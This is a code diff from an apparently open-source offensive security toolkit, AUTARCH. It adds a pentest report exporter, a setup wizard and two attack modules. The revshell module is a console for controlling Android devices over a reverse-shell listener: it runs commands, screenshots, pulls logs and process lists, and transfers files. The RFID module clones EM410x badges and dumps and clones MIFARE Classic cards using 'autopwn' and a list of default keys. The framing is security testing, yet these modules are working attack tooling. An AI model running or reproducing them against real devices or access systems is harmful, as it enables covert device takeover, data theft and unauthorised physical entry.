md += f"**Client:** {report.get('client', 'N/A')} \n"
md += f"**Date:** {report.get('created_at', '')[:10]} \n"
md += f"**Author:** {report.get('author', 'AUTARCH')} \n"
md += f"**Status:** {report.get('status', 'draft')} \n\n"
md += "## Executive Summary\n\n"
md += report.get('executive_summary', 'N/A') + "\n\n"
md += "## Scope\n\n"
md += report.get('scope', 'N/A') + "\n\n"
md += "## Findings\n\n"
sorted_findings = sorted(report.get('findings', []),
key=lambda f: SEVERITY_MAP.get(f.get('severity', 'info'), {}).get('order', 5))
for i, f in enumerate(sorted_findings, 1):
md += f"### {i}. [{f.get('severity', 'info').upper()}] {f.get('title', 'Untitled')}\n\n"
md += f"**CVSS:** {f.get('cvss', 'N/A')} | **Status:** {f.get('status', 'open')}\n\n"
md += f"**Description:** {f.get('description', '')}\n\n"
md += f"**Impact:** {f.get('impact', '')}\n\n"
md += f"**Remediation:** {f.get('remediation', '')}\n\n"
if f.get('evidence'):
md += "**Evidence:**\n```\n" + '\n'.join(f['evidence']) + "\n```\n\n"
if f.get('references'):
md += "**References:** " + ', '.join(f['references']) + "\n\n"
md += "---\n\n"
md += f"\n*Generated by AUTARCH — {datetime.now(timezone.utc).strftime('%Y-%m-%d')}*\n"
return md
def export_json(self, report_id: str) -> Optional[str]:
report = self.get_report(report_id)
if not report:
return None
return json.dumps(report, indent=2)
# ── Internal ──────────────────────────────────────────────────────────
def _save_report(self, report: dict):
path = os.path.join(self._data_dir, f'{report["id"]}.json')
with open(path, 'w') as f:
json.dump(report, f, indent=2)
def _esc(s: str) -> str:
return (s or '').replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')
# ── Singleton ─────────────────────────────────────────────────────────────────
_instance = None
_lock = threading.Lock()
def get_report_engine() -> ReportEngine:
global _instance
if _instance is None:
with _lock:
if _instance is None:
_instance = ReportEngine()
return _instance
# ── CLI ───────────────────────────────────────────────────────────────────────
def run():
"""Interactive CLI for Reporting Engine."""
svc = get_report_engine()
while True:
print("\n╔═══════════════════════════════════════╗")
print("║ REPORTING ENGINE ║")
print("╠═══════════════════════════════════════╣")
print("║ 1 — List Reports ║")
print("║ 2 — Create Report ║")
print("║ 3 — Add Finding ║")
print("║ 4 — Export Report ║")
print("║ 5 — Finding Templates ║")
print("║ 0 — Back ║")
print("╚═══════════════════════════════════════╝")
choice = input("\n Select: ").strip()
if choice == '0':
break
elif choice == '1':
reports = svc.list_reports()
if not reports:
print("\n No reports.")
continue
for r in reports:
print(f" [{r['id']}] {r['title']}{r['findings_count']} findings "
f"({r['status']}) {r['updated_at'][:10]}")
elif choice == '2':
title = input(" Report title: ").strip()
client = input(" Client name: ").strip()
scope = input(" Scope: ").strip()
r = svc.create_report(title, client, scope)
print(f" Created report: {r['report']['id']}")
elif choice == '3':
rid = input(" Report ID: ").strip()
print(" Available templates:")
for i, t in enumerate(FINDING_TEMPLATES, 1):
print(f" {i}. [{t['severity'].upper()}] {t['title']}")
sel = input(" Template # (0 for custom): ").strip()
if sel and sel != '0':
idx = int(sel) - 1
if 0 <= idx < len(FINDING_TEMPLATES):
f = FINDING_TEMPLATES[idx].copy()
f.pop('id', None)
r = svc.add_finding(rid, f)
if r['ok']:
print(f" Added: {f['title']}")
else:
title = input(" Title: ").strip()
severity = input(" Severity (critical/high/medium/low/info): ").strip()
desc = input(" Description: ").strip()
r = svc.add_finding(rid, {'title': title, 'severity': severity,
'description': desc})
if r['ok']:
print(f" Added finding: {r['finding']['id']}")
elif choice == '4':
rid = input(" Report ID: ").strip()
fmt = input(" Format (html/markdown/json): ").strip() or 'html'
if fmt == 'html':
content = svc.export_html(rid)
elif fmt == 'markdown':
content = svc.export_markdown(rid)
else:
content = svc.export_json(rid)
if content:
ext = {'html': 'html', 'markdown': 'md', 'json': 'json'}.get(fmt, 'txt')
outpath = os.path.join(svc._data_dir, f'{rid}.{ext}')
with open(outpath, 'w') as f:
f.write(content)
print(f" Exported to: {outpath}")
else:
print(" Report not found.")
elif choice == '5':
for t in FINDING_TEMPLATES:
print(f" [{t['severity'].upper():8s}] {t['title']} (CVSS {t['cvss']})")

1979
modules/reverse_eng.py Normal file

File diff suppressed because it is too large Load Diff

365
modules/revshell.py Normal file
View File

@@ -0,0 +1,365 @@
"""
Reverse Shell Manager - Manage incoming reverse shell connections from Archon companion app.
Control the RevShell listener, manage sessions, execute commands, transfer files.
"""
DESCRIPTION = "Reverse Shell — remote device management via Archon"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "offense"
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).parent.parent))
class RevShellManager:
"""Interactive reverse shell management menu."""
def __init__(self):
from core.revshell import get_listener
self._get_listener = get_listener
@property
def listener(self):
return self._get_listener()
def show_menu(self):
li = self.listener
sessions = li.list_sessions()
alive = [s for s in sessions if s.get('alive', False)]
print(f"\n{'='*55}")
print(" Reverse Shell Manager")
print(f"{'='*55}")
print(f" Listener: {'RUNNING on ' + str(li.host) + ':' + str(li.port) if li.running else 'Stopped'}")
print(f" Sessions: {len(alive)} active, {len(sessions)} total")
if li.running:
print(f" Token: {li.auth_token}")
print()
print(" -- Listener --")
print(" 1) Start Listener")
print(" 2) Stop Listener")
print(" 3) Listener Status")
print()
print(" -- Sessions --")
print(" 10) List Sessions")
print(" 11) Select Session (interactive shell)")
print(" 12) Execute Command")
print(" 13) Disconnect Session")
print()
print(" -- Device Info --")
print(" 20) System Info")
print(" 21) Installed Packages")
print(" 22) Running Processes")
print(" 23) Network Connections")
print(" 24) Logcat Output")
print()
print(" -- Capture --")
print(" 30) Take Screenshot")
print(" 31) Download File")
print(" 32) Upload File")
print()
print(" 0) Back")
print()
# ── Helpers ─────────────────────────────────────────────────────
def _pick_session(self, prompt=" Select session #: "):
"""Let user pick a session from the list."""
sessions = self.listener.list_sessions()
alive = [s for s in sessions if s.get('alive', False)]
if not alive:
print(" No active sessions.")
return None
print("\n Active Sessions:")
for i, s in enumerate(alive, 1):
uptime_m = s.get('uptime', 0) // 60
print(f" {i}) [{s['session_id'][:8]}] {s['device']} "
f"(Android {s['android']}, UID {s['uid']}) — {uptime_m}m")
try:
choice = int(input(prompt).strip())
if 1 <= choice <= len(alive):
return alive[choice - 1]['session_id']
except (ValueError, EOFError, KeyboardInterrupt):
pass
return None
def _get_session_obj(self, sid):
"""Get the actual session object."""
session = self.listener.get_session(sid)
if not session or not session.alive:
print(f" Session {sid} not found or dead.")
return None
return session
# ── Listener ────────────────────────────────────────────────────
def do_start(self):
if self.listener.running:
print(" Listener already running.")
return
try:
host = input(f" Bind address [0.0.0.0]: ").strip() or '0.0.0.0'
port_s = input(f" Port [17322]: ").strip() or '17322'
token = input(f" Auth token (blank=random): ").strip() or None
except (EOFError, KeyboardInterrupt):
return
from core.revshell import start_listener
ok, msg = start_listener(host=host, port=int(port_s), token=token)
if ok:
print(f" {msg}")
print(f" Token: {self.listener.auth_token}")
else:
print(f" Error: {msg}")
def do_stop(self):
if not self.listener.running:
print(" Listener not running.")
return
from core.revshell import stop_listener
stop_listener()
print(" Listener stopped.")
def do_status(self):
li = self.listener
print(f"\n Listener Status:")
print(f" Running: {li.running}")
print(f" Host: {li.host}")
print(f" Port: {li.port}")
print(f" Token: {li.auth_token}")
sessions = li.list_sessions()
alive = [s for s in sessions if s.get('alive', False)]
print(f" Sessions: {len(alive)} active, {len(sessions)} total")
# ── Sessions ────────────────────────────────────────────────────
def do_list_sessions(self):
sessions = self.listener.list_sessions()
if not sessions:
print("\n No sessions.")
return
print(f"\n {'ID':<14} {'Device':<20} {'Android':<10} {'UID':<6} {'Uptime':<10} {'Cmds':<6} {'Status'}")
print(f" {'-'*80}")
for s in sessions:
uptime_m = s.get('uptime', 0) // 60
status = 'ALIVE' if s.get('alive') else 'DEAD'
print(f" {s['session_id']:<14} {s['device']:<20} {s['android']:<10} "
f"{s['uid']:<6} {uptime_m}m{'':<7} {s.get('commands_executed', 0):<6} {status}")
def do_interactive_shell(self):
sid = self._pick_session()
if not sid:
return
session = self._get_session_obj(sid)
if not session:
return
print(f"\n Interactive shell — {session.device_name} (Android {session.android_version})")
print(f" Type 'exit' or Ctrl+C to leave.\n")
while session.alive:
try:
cmd = input(f" {session.device_name}$ ").strip()
except (EOFError, KeyboardInterrupt):
print()
break
if not cmd:
continue
if cmd.lower() in ('exit', 'quit'):
break
result = session.execute(cmd, timeout=30)
if result['stdout']:
for line in result['stdout'].rstrip('\n').split('\n'):
print(f" {line}")
if result['stderr']:
for line in result['stderr'].rstrip('\n').split('\n'):
print(f" [stderr] {line}")
if result['exit_code'] != 0:
print(f" [exit code: {result['exit_code']}]")
def do_execute_command(self):
sid = self._pick_session()
if not sid:
return
session = self._get_session_obj(sid)
if not session:
return
try:
cmd = input(" Command: ").strip()
timeout_s = input(" Timeout [30]: ").strip() or '30'
except (EOFError, KeyboardInterrupt):
return
if not cmd:
return
print(f" Executing on {session.device_name}...")
result = session.execute(cmd, timeout=int(timeout_s))
if result['stdout']:
print(f"\n --- stdout ---")
for line in result['stdout'].rstrip('\n').split('\n'):
print(f" {line}")
if result['stderr']:
print(f"\n --- stderr ---")
for line in result['stderr'].rstrip('\n').split('\n'):
print(f" {line}")
print(f"\n Exit code: {result['exit_code']}")
def do_disconnect_session(self):
sid = self._pick_session(" Session to disconnect #: ")
if not sid:
return
self.listener.remove_session(sid)
print(f" Session {sid} disconnected.")
# ── Device Info ─────────────────────────────────────────────────
def _run_special(self, label, method_name, **kwargs):
sid = self._pick_session()
if not sid:
return
session = self._get_session_obj(sid)
if not session:
return
print(f" Fetching {label} from {session.device_name}...")
method = getattr(session, method_name)
result = method(**kwargs)
if result.get('exit_code', -1) == 0:
output = result.get('stdout', '')
if output:
for line in output.rstrip('\n').split('\n'):
print(f" {line}")
else:
print(f" (no output)")
else:
print(f" Error: {result.get('stderr', 'Failed')}")
def do_sysinfo(self):
self._run_special("system info", "sysinfo")
def do_packages(self):
self._run_special("packages", "packages")
def do_processes(self):
self._run_special("processes", "processes")
def do_netstat(self):
self._run_special("network connections", "netstat")
def do_logcat(self):
try:
lines = input(" Lines [100]: ").strip() or '100'
except (EOFError, KeyboardInterrupt):
return
sid = self._pick_session()
if not sid:
return
session = self._get_session_obj(sid)
if not session:
return
print(f" Fetching logcat ({lines} lines) from {session.device_name}...")
result = session.dumplog(lines=int(lines))
if result.get('exit_code', -1) == 0:
output = result.get('stdout', '')
if output:
for line in output.rstrip('\n').split('\n'):
print(f" {line}")
else:
print(f" Error: {result.get('stderr', 'Failed')}")
# ── Capture ─────────────────────────────────────────────────────
def do_screenshot(self):
sid = self._pick_session()
if not sid:
return
print(f" Taking screenshot...")
filepath = self.listener.save_screenshot(sid)
if filepath:
print(f" Saved: {filepath}")
else:
print(f" Screenshot failed.")
def do_download(self):
sid = self._pick_session()
if not sid:
return
try:
remote_path = input(" Remote file path: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not remote_path:
return
print(f" Downloading {remote_path}...")
filepath = self.listener.save_download(sid, remote_path)
if filepath:
print(f" Saved: {filepath}")
else:
print(f" Download failed.")
def do_upload(self):
sid = self._pick_session()
if not sid:
return
try:
local_path = input(" Local file path: ").strip()
remote_path = input(" Remote destination: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not local_path or not remote_path:
return
if not Path(local_path).exists():
print(f" Local file not found: {local_path}")
return
session = self._get_session_obj(sid)
if not session:
return
print(f" Uploading to {remote_path}...")
result = session.upload(local_path, remote_path)
if result.get('exit_code', -1) == 0:
print(f" Upload complete.")
else:
print(f" Error: {result.get('stderr', 'Failed')}")
# ── Main Loop ──────────────────────────────────────────────────
def run_interactive(self):
while True:
self.show_menu()
try:
choice = input(" Select > ").strip()
except (EOFError, KeyboardInterrupt):
break
if choice == '0':
break
actions = {
'1': self.do_start,
'2': self.do_stop,
'3': self.do_status,
'10': self.do_list_sessions,
'11': self.do_interactive_shell,
'12': self.do_execute_command,
'13': self.do_disconnect_session,
'20': self.do_sysinfo,
'21': self.do_packages,
'22': self.do_processes,
'23': self.do_netstat,
'24': self.do_logcat,
'30': self.do_screenshot,
'31': self.do_download,
'32': self.do_upload,
}
action = actions.get(choice)
if action:
action()
else:
print(" Invalid choice.")
def run():
mgr = RevShellManager()
mgr.run_interactive()

455
modules/rfid_tools.py Normal file
View File

@@ -0,0 +1,455 @@
"""AUTARCH RFID/NFC Tools
Proxmark3 integration, badge cloning, NFC read/write, MIFARE operations,
and card analysis for physical access security testing.
"""
DESCRIPTION = "RFID/NFC badge cloning & analysis"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "analyze"
import os
import re
import json
import time
import shutil
import subprocess
from pathlib import Path
from datetime import datetime, timezone
from typing import Dict, List, Optional, Any
try:
from core.paths import find_tool, get_data_dir
except ImportError:
def find_tool(name):
return shutil.which(name)
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
# ── Card Types ───────────────────────────────────────────────────────────────
CARD_TYPES = {
'em410x': {'name': 'EM410x', 'frequency': '125 kHz', 'category': 'LF'},
'hid_prox': {'name': 'HID ProxCard', 'frequency': '125 kHz', 'category': 'LF'},
't5577': {'name': 'T5577', 'frequency': '125 kHz', 'category': 'LF', 'writable': True},
'mifare_classic_1k': {'name': 'MIFARE Classic 1K', 'frequency': '13.56 MHz', 'category': 'HF'},
'mifare_classic_4k': {'name': 'MIFARE Classic 4K', 'frequency': '13.56 MHz', 'category': 'HF'},
'mifare_ultralight': {'name': 'MIFARE Ultralight', 'frequency': '13.56 MHz', 'category': 'HF'},
'mifare_desfire': {'name': 'MIFARE DESFire', 'frequency': '13.56 MHz', 'category': 'HF'},
'ntag213': {'name': 'NTAG213', 'frequency': '13.56 MHz', 'category': 'HF', 'nfc': True},
'ntag215': {'name': 'NTAG215', 'frequency': '13.56 MHz', 'category': 'HF', 'nfc': True},
'ntag216': {'name': 'NTAG216', 'frequency': '13.56 MHz', 'category': 'HF', 'nfc': True},
'iclass': {'name': 'iCLASS', 'frequency': '13.56 MHz', 'category': 'HF'},
'iso14443a': {'name': 'ISO 14443A', 'frequency': '13.56 MHz', 'category': 'HF'},
'iso15693': {'name': 'ISO 15693', 'frequency': '13.56 MHz', 'category': 'HF'},
'legic': {'name': 'LEGIC', 'frequency': '13.56 MHz', 'category': 'HF'},
}
MIFARE_DEFAULT_KEYS = [
'FFFFFFFFFFFF', 'A0A1A2A3A4A5', 'D3F7D3F7D3F7',
'000000000000', 'B0B1B2B3B4B5', '4D3A99C351DD',
'1A982C7E459A', 'AABBCCDDEEFF', '714C5C886E97',
'587EE5F9350F', 'A0478CC39091', '533CB6C723F6',
]
# ── RFID Manager ─────────────────────────────────────────────────────────────
class RFIDManager:
"""RFID/NFC tool management via Proxmark3 and nfc-tools."""
def __init__(self):
self.data_dir = os.path.join(get_data_dir(), 'rfid')
os.makedirs(self.data_dir, exist_ok=True)
self.dumps_dir = os.path.join(self.data_dir, 'dumps')
os.makedirs(self.dumps_dir, exist_ok=True)
# Tool discovery
self.pm3_client = find_tool('pm3') or find_tool('proxmark3') or shutil.which('pm3') or shutil.which('proxmark3')
self.nfc_list = shutil.which('nfc-list')
self.nfc_poll = shutil.which('nfc-poll')
self.nfc_mfclassic = shutil.which('nfc-mfclassic')
self.cards: List[Dict] = []
self.last_read: Optional[Dict] = None
def get_tools_status(self) -> Dict:
"""Check available tools."""
return {
'proxmark3': self.pm3_client is not None,
'nfc-list': self.nfc_list is not None,
'nfc-mfclassic': self.nfc_mfclassic is not None,
'card_types': len(CARD_TYPES),
'saved_cards': len(self.cards)
}
# ── Proxmark3 Commands ───────────────────────────────────────────────
def _pm3_cmd(self, command: str, timeout: int = 15) -> Dict:
"""Execute Proxmark3 command."""
if not self.pm3_client:
return {'ok': False, 'error': 'Proxmark3 client not found'}
try:
result = subprocess.run(
[self.pm3_client, '-c', command],
capture_output=True, text=True, timeout=timeout
)
return {
'ok': result.returncode == 0,
'stdout': result.stdout,
'stderr': result.stderr
}
except subprocess.TimeoutExpired:
return {'ok': False, 'error': f'Command timed out: {command}'}
except Exception as e:
return {'ok': False, 'error': str(e)}
# ── Low Frequency (125 kHz) ──────────────────────────────────────────
def lf_search(self) -> Dict:
"""Search for LF (125 kHz) cards."""
result = self._pm3_cmd('lf search')
if not result['ok']:
return result
output = result['stdout']
card = {'frequency': '125 kHz', 'category': 'LF'}
# Parse EM410x
em_match = re.search(r'EM\s*410x.*?ID[:\s]*([A-Fa-f0-9]+)', output, re.I)
if em_match:
card['type'] = 'em410x'
card['id'] = em_match.group(1)
card['name'] = 'EM410x'
# Parse HID
hid_match = re.search(r'HID.*?Card.*?([A-Fa-f0-9]+)', output, re.I)
if hid_match:
card['type'] = 'hid_prox'
card['id'] = hid_match.group(1)
card['name'] = 'HID ProxCard'
if 'id' in card:
card['raw_output'] = output
self.last_read = card
return {'ok': True, 'card': card}
return {'ok': False, 'error': 'No LF card found', 'raw': output}
def lf_read_em410x(self) -> Dict:
"""Read EM410x card."""
result = self._pm3_cmd('lf em 410x reader')
if not result['ok']:
return result
match = re.search(r'EM\s*410x\s+ID[:\s]*([A-Fa-f0-9]+)', result['stdout'], re.I)
if match:
card = {
'type': 'em410x', 'id': match.group(1),
'name': 'EM410x', 'frequency': '125 kHz'
}
self.last_read = card
return {'ok': True, 'card': card}
return {'ok': False, 'error': 'Could not read EM410x', 'raw': result['stdout']}
def lf_clone_em410x(self, card_id: str) -> Dict:
"""Clone EM410x ID to T5577 card."""
result = self._pm3_cmd(f'lf em 410x clone --id {card_id}')
return {
'ok': 'written' in result.get('stdout', '').lower() or result['ok'],
'message': f'Cloned EM410x ID {card_id}' if result['ok'] else result.get('error', ''),
'raw': result.get('stdout', '')
}
def lf_sim_em410x(self, card_id: str) -> Dict:
"""Simulate EM410x card."""
result = self._pm3_cmd(f'lf em 410x sim --id {card_id}', timeout=30)
return {
'ok': result['ok'],
'message': f'Simulating EM410x ID {card_id}',
'raw': result.get('stdout', '')
}
# ── High Frequency (13.56 MHz) ───────────────────────────────────────
def hf_search(self) -> Dict:
"""Search for HF (13.56 MHz) cards."""
result = self._pm3_cmd('hf search')
if not result['ok']:
return result
output = result['stdout']
card = {'frequency': '13.56 MHz', 'category': 'HF'}
# Parse UID
uid_match = re.search(r'UID[:\s]*([A-Fa-f0-9\s]+)', output, re.I)
if uid_match:
card['uid'] = uid_match.group(1).replace(' ', '').strip()
# Parse ATQA/SAK
atqa_match = re.search(r'ATQA[:\s]*([A-Fa-f0-9\s]+)', output, re.I)
if atqa_match:
card['atqa'] = atqa_match.group(1).strip()
sak_match = re.search(r'SAK[:\s]*([A-Fa-f0-9]+)', output, re.I)
if sak_match:
card['sak'] = sak_match.group(1).strip()
# Detect type
if 'mifare classic 1k' in output.lower():
card['type'] = 'mifare_classic_1k'
card['name'] = 'MIFARE Classic 1K'
elif 'mifare classic 4k' in output.lower():
card['type'] = 'mifare_classic_4k'
card['name'] = 'MIFARE Classic 4K'
elif 'ultralight' in output.lower() or 'ntag' in output.lower():
card['type'] = 'mifare_ultralight'
card['name'] = 'MIFARE Ultralight/NTAG'
elif 'desfire' in output.lower():
card['type'] = 'mifare_desfire'
card['name'] = 'MIFARE DESFire'
elif 'iso14443' in output.lower():
card['type'] = 'iso14443a'
card['name'] = 'ISO 14443A'
if 'uid' in card:
card['raw_output'] = output
self.last_read = card
return {'ok': True, 'card': card}
return {'ok': False, 'error': 'No HF card found', 'raw': output}
def hf_dump_mifare(self, keys_file: str = None) -> Dict:
"""Dump MIFARE Classic card data."""
cmd = 'hf mf autopwn'
if keys_file:
cmd += f' -f {keys_file}'
result = self._pm3_cmd(cmd, timeout=120)
if not result['ok']:
return result
output = result['stdout']
# Look for dump file
dump_match = re.search(r'saved.*?(\S+\.bin)', output, re.I)
if dump_match:
dump_file = dump_match.group(1)
# Copy to our dumps directory
dest = os.path.join(self.dumps_dir, Path(dump_file).name)
if os.path.exists(dump_file):
shutil.copy2(dump_file, dest)
return {
'ok': True,
'dump_file': dest,
'message': 'MIFARE dump complete',
'raw': output
}
# Check for found keys
keys = re.findall(r'key\s*[AB][:\s]*([A-Fa-f0-9]{12})', output, re.I)
if keys:
return {
'ok': True,
'keys_found': list(set(keys)),
'message': f'Found {len(set(keys))} keys',
'raw': output
}
return {'ok': False, 'error': 'Dump failed', 'raw': output}
def hf_clone_mifare(self, dump_file: str) -> Dict:
"""Write MIFARE dump to blank card."""
result = self._pm3_cmd(f'hf mf restore -f {dump_file}', timeout=60)
return {
'ok': 'restored' in result.get('stdout', '').lower() or result['ok'],
'message': 'Card cloned' if result['ok'] else 'Clone failed',
'raw': result.get('stdout', '')
}
# ── NFC Operations (via libnfc) ──────────────────────────────────────
def nfc_scan(self) -> Dict:
"""Scan for NFC tags using libnfc."""
if not self.nfc_list:
return {'ok': False, 'error': 'nfc-list not found (install libnfc)'}
try:
result = subprocess.run(
[self.nfc_list], capture_output=True, text=True, timeout=10
)
tags = []
for line in result.stdout.splitlines():
uid_match = re.search(r'UID.*?:\s*([A-Fa-f0-9\s:]+)', line, re.I)
if uid_match:
tags.append({
'uid': uid_match.group(1).replace(' ', '').replace(':', ''),
'raw': line.strip()
})
return {'ok': True, 'tags': tags, 'count': len(tags)}
except Exception as e:
return {'ok': False, 'error': str(e)}
# ── Card Database ────────────────────────────────────────────────────
def save_card(self, card: Dict, name: str = None) -> Dict:
"""Save card data to database."""
card['saved_at'] = datetime.now(timezone.utc).isoformat()
card['display_name'] = name or card.get('name', 'Unknown Card')
# Remove raw output to save space
card.pop('raw_output', None)
self.cards.append(card)
self._save_cards()
return {'ok': True, 'count': len(self.cards)}
def get_saved_cards(self) -> List[Dict]:
"""List saved cards."""
return self.cards
def delete_card(self, index: int) -> Dict:
"""Delete saved card by index."""
if 0 <= index < len(self.cards):
self.cards.pop(index)
self._save_cards()
return {'ok': True}
return {'ok': False, 'error': 'Invalid index'}
def _save_cards(self):
cards_file = os.path.join(self.data_dir, 'cards.json')
with open(cards_file, 'w') as f:
json.dump(self.cards, f, indent=2)
def _load_cards(self):
cards_file = os.path.join(self.data_dir, 'cards.json')
if os.path.exists(cards_file):
try:
with open(cards_file) as f:
self.cards = json.load(f)
except Exception:
pass
def list_dumps(self) -> List[Dict]:
"""List saved card dumps."""
dumps = []
for f in Path(self.dumps_dir).iterdir():
if f.is_file():
dumps.append({
'name': f.name, 'path': str(f),
'size': f.stat().st_size,
'modified': datetime.fromtimestamp(f.stat().st_mtime, timezone.utc).isoformat()
})
return dumps
def get_default_keys(self) -> List[str]:
"""Return common MIFARE default keys."""
return MIFARE_DEFAULT_KEYS
def get_card_types(self) -> Dict:
"""Return supported card type info."""
return CARD_TYPES
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None
def get_rfid_manager() -> RFIDManager:
global _instance
if _instance is None:
_instance = RFIDManager()
_instance._load_cards()
return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
"""CLI entry point for RFID/NFC module."""
mgr = get_rfid_manager()
while True:
tools = mgr.get_tools_status()
print(f"\n{'='*60}")
print(f" RFID / NFC Tools")
print(f"{'='*60}")
print(f" Proxmark3: {'OK' if tools['proxmark3'] else 'NOT FOUND'}")
print(f" libnfc: {'OK' if tools['nfc-list'] else 'NOT FOUND'}")
print(f" Saved cards: {tools['saved_cards']}")
print()
print(" 1 — LF Search (125 kHz)")
print(" 2 — HF Search (13.56 MHz)")
print(" 3 — Read EM410x")
print(" 4 — Clone EM410x to T5577")
print(" 5 — Dump MIFARE Classic")
print(" 6 — Clone MIFARE from Dump")
print(" 7 — NFC Scan (libnfc)")
print(" 8 — Saved Cards")
print(" 9 — Card Dumps")
print(" 0 — Back")
print()
choice = input(" > ").strip()
if choice == '0':
break
elif choice == '1':
result = mgr.lf_search()
if result['ok']:
c = result['card']
print(f" Found: {c.get('name', '?')} ID: {c.get('id', '?')}")
else:
print(f" {result.get('error', 'No card found')}")
elif choice == '2':
result = mgr.hf_search()
if result['ok']:
c = result['card']
print(f" Found: {c.get('name', '?')} UID: {c.get('uid', '?')}")
else:
print(f" {result.get('error', 'No card found')}")
elif choice == '3':
result = mgr.lf_read_em410x()
if result['ok']:
print(f" EM410x ID: {result['card']['id']}")
save = input(" Save card? (y/n): ").strip()
if save.lower() == 'y':
mgr.save_card(result['card'])
else:
print(f" {result['error']}")
elif choice == '4':
card_id = input(" EM410x ID to clone: ").strip()
if card_id:
result = mgr.lf_clone_em410x(card_id)
print(f" {result.get('message', result.get('error'))}")
elif choice == '5':
result = mgr.hf_dump_mifare()
if result['ok']:
print(f" {result['message']}")
if 'keys_found' in result:
for k in result['keys_found']:
print(f" Key: {k}")
else:
print(f" {result['error']}")
elif choice == '6':
dump = input(" Dump file path: ").strip()
if dump:
result = mgr.hf_clone_mifare(dump)
print(f" {result['message']}")
elif choice == '7':
result = mgr.nfc_scan()
if result['ok']:
print(f" Found {result['count']} tags:")
for t in result['tags']:
print(f" UID: {t['uid']}")
else:
print(f" {result['error']}")
elif choice == '8':
cards = mgr.get_saved_cards()
for i, c in enumerate(cards):
print(f" [{i}] {c.get('display_name', '?')} "
f"{c.get('type', '?')} ID={c.get('id', c.get('uid', '?'))}")
elif choice == '9':
for d in mgr.list_dumps():
print(f" {d['name']} ({d['size']} bytes)")

1031
modules/rsf.py Normal file

File diff suppressed because it is too large Load Diff

2091
modules/sdr_tools.py Normal file

File diff suppressed because it is too large Load Diff

558
modules/setup.py Normal file
View File

@@ -0,0 +1,558 @@
"""
AUTARCH Setup Module
First-time configuration wizard for LLM settings
Supports GGUF (llama.cpp) and SafeTensors (transformers) models
"""
import os
import sys
from pathlib import Path
# Add parent directory to path for imports
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.config import get_config
from core.banner import Colors, clear_screen, display_banner
class SetupWizard:
"""Interactive setup wizard for AUTARCH configuration."""
def __init__(self):
self.config = get_config()
def print_header(self, text: str):
"""Print a formatted section header."""
print(f"\n{Colors.CYAN}{Colors.BOLD}[*] {text}{Colors.RESET}")
print(f"{Colors.DIM}{'' * 60}{Colors.RESET}")
def print_info(self, text: str):
"""Print info message."""
print(f"{Colors.GREEN} {text}{Colors.RESET}")
def print_warning(self, text: str):
"""Print warning message."""
print(f"{Colors.YELLOW}[!] {text}{Colors.RESET}")
def print_error(self, text: str):
"""Print error message."""
print(f"{Colors.RED}[X] {text}{Colors.RESET}")
def get_input(self, prompt: str, default: str = None) -> str:
"""Get user input with optional default value.
Args:
prompt: The prompt to display
default: Default value if user presses enter
Returns:
User input or default value
"""
if default:
prompt_text = f"{Colors.WHITE} {prompt} [{Colors.YELLOW}{default}{Colors.WHITE}]: {Colors.RESET}"
else:
prompt_text = f"{Colors.WHITE} {prompt}: {Colors.RESET}"
try:
value = input(prompt_text).strip()
return value if value else default
except (EOFError, KeyboardInterrupt):
print()
return default
def get_int_input(self, prompt: str, default: int, min_val: int = None, max_val: int = None) -> int:
"""Get integer input with validation.
Args:
prompt: The prompt to display
default: Default value
min_val: Minimum allowed value
max_val: Maximum allowed value
Returns:
Validated integer value
"""
while True:
value = self.get_input(prompt, str(default))
try:
int_val = int(value)
if min_val is not None and int_val < min_val:
self.print_error(f"Value must be at least {min_val}")
continue
if max_val is not None and int_val > max_val:
self.print_error(f"Value must be at most {max_val}")
continue
return int_val
except ValueError:
self.print_error("Please enter a valid number")
def get_float_input(self, prompt: str, default: float, min_val: float = None, max_val: float = None) -> float:
"""Get float input with validation."""
while True:
value = self.get_input(prompt, str(default))
try:
float_val = float(value)
if min_val is not None and float_val < min_val:
self.print_error(f"Value must be at least {min_val}")
continue
if max_val is not None and float_val > max_val:
self.print_error(f"Value must be at most {max_val}")
continue
return float_val
except ValueError:
self.print_error("Please enter a valid number")
def validate_model_path(self, path: str) -> tuple:
"""Validate that a model file or directory exists.
Args:
path: Path to the model file or directory
Returns:
Tuple of (is_valid, model_type) where model_type is 'gguf', 'transformers', or None
"""
if not path:
return False, None
path = Path(os.path.expanduser(path))
try:
if not path.exists():
return False, None
except (PermissionError, OSError):
return False, None
# Check for GGUF file
if path.is_file():
if path.suffix.lower() == '.gguf':
return True, 'gguf'
# Check magic bytes for GGUF without extension
try:
with open(path, 'rb') as f:
magic = f.read(4)
if magic == b'GGUF':
return True, 'gguf'
except Exception:
pass
# Could still be a valid file for llama.cpp
return True, 'gguf'
# Check for safetensors/transformers directory
if path.is_dir():
# Check for safetensors files
safetensor_files = list(path.glob("*.safetensors"))
index_file = path / "model.safetensors.index.json"
config_file = path / "config.json"
if safetensor_files or index_file.exists():
return True, 'transformers'
# Check for pytorch bin files (also transformers format)
bin_files = list(path.glob("*.bin"))
if config_file.exists() and (bin_files or (path / "pytorch_model.bin").exists()):
return True, 'transformers'
# Directory exists but no recognized model format
if config_file.exists():
return True, 'transformers'
return False, None
def validate_model_path_legacy(self, path: str) -> bool:
"""Legacy validation - just checks if file exists.
Args:
path: Path to the model file
Returns:
True if valid, False otherwise
"""
if not path:
return False
path = os.path.expanduser(path)
return os.path.isfile(path) or os.path.isdir(path)
def _is_huggingface_id(self, path: str) -> bool:
"""Check if the path looks like a HuggingFace model ID.
HuggingFace model IDs are in format 'org/model-name' or 'username/model-name'.
Args:
path: The path/ID to check
Returns:
True if it looks like a HuggingFace model ID
"""
if not path:
return False
# Must contain exactly one '/' and not start with '/'
# Also should not contain path separators like '\' or multiple '/'
if path.startswith('/') or path.startswith('\\'):
return False
parts = path.split('/')
if len(parts) == 2 and all(p and not p.startswith('.') for p in parts):
# Looks like org/model-name format
return True
return False
def resolve_model_path(self, path: str) -> str:
"""Resolve a model path, trying multiple variations.
Args:
path: User-provided path (may be relative or have variations)
Returns:
Resolved absolute path if found, None otherwise
"""
from core.paths import get_app_dir
framework_dir = get_app_dir()
